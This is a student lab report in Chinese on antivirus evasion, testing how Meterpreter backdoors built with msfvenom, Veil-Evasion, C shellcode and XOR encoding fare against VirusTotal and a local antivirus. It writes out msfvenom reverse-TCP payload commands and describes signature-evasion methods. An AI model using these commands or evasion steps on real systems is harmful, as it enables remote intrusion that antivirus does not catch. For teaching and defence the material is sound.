Exp3 免杀原理与实践

 

 

20154331EXP3 免杀原理与实践

 

  •   实验测试
  •   基础问题回答 
  •   实验总结

 

一、实验测试

1、原始版本

     将上次实验生成的后门程序拷贝到win主机中,电脑管家发现可疑。

       

 

 

 将它放在https://www.virustotal.com/上进行扫描后发现52个报警。可怕。

 

 

 

 

接下来对它进行改装。

2、编码版本

     编码部分我进行了一次编码,结果和上次没什么区别。

 

   msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.116.129 LPORT=4331 -f exe > 4331houmen.exe

 

3、veil-evasion版本

安装veil的步骤我就不说了,apt-get install veil-evasion.

一步一步来就好了。

list:

 

use 1:

 

 

然后我在这么多payloads中选了c语言中的一个,我选的8.

寻找的方法:

其他位置--->计算机--var-->lib-->veil-->output-->complied-->....exe。

找到以后再把它托到win主机中用https://www.virustotal.com/进行扫描,咦!可以可以少了好多。

 

 

 

    

但是还是被管家无情的拦截了...

4、使用C语言调用Shellcode

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.129 LPORT=4331 -f c ,这里使用kali的ip生成一个c语言格式的shellcode数组。

然后将shellcode字符串复制下来,在win主机写一个C语言程序,我用的是vc编译运行。

 

完全可以运行,而且我的电脑也没有拦截,是不是成功了???

我用电脑管家扫描它,还是被拦截了(这里我忘记截图了,反正还是拦截了奇怪。)24

然后我把这个代码生成的病毒文件用https://www.virustotal.com/扫描,结果你猜....

 

居然还是有24个报毒...但是比上一个veil又少了一些。

5、c语言升级版

我们把上一个c语言的程序稍微改一下,看看能不能做到免杀。

把原来的每个特征码和31异或,然后特征码就和原来的不一样了,最后再在主函数里和 31异或。源代码老师说不要弄到报告中,这里就不截图了

最后这个c程序生成了一个我取名为2的文件。再将它拿去扫描一下,嗯....还是有毒,但是又少了一些。

 但是运行的时候还是被电脑管家查出来了,无语.....

 

可能我的电脑管家是基于行为的检测???

二、基础问题回答

 

(1)杀软是如何检测出恶意代码的?

 

 1、杀毒软件可以靠特征码进行查杀,匹配到即为病毒。

 2、启发式恶意代码的检测:还有通过云查杀,查看云端库中该文件是否属于恶意代码。

 3、基于行为的检测:跟踪该程序运行起来是否存在恶意行为,来判断是否属于恶意代码。

 

(2)免杀是做什么?

 使恶意软件不被杀毒软件检测出来,让杀毒软件查杀不出来有问题的程序。

 

(3)免杀的基本方法有哪些?

 通过改变特征码来躲避杀毒软件的匹配。

 自己手动编写一个恶意代码,因为杀毒软件查的共性,而不是个性。

 改变行为,减少敏感行为的使用等。

三、实验总结:

   这是我的第三次网络对抗的实验,越来越觉得网络这个东西还是挺可怕的,也感叹黑客们的脑子真好用,这次的免杀实验让我意识到了杀毒软件只能起到预防的作用,更重要的是不要手贱乱点!!! 实现了从最早的52到32到24再到18的突破哈哈哈。

 

posted @ 2018-04-07 20:38  20154331黄芮  阅读(139)  评论(0编辑  收藏  举报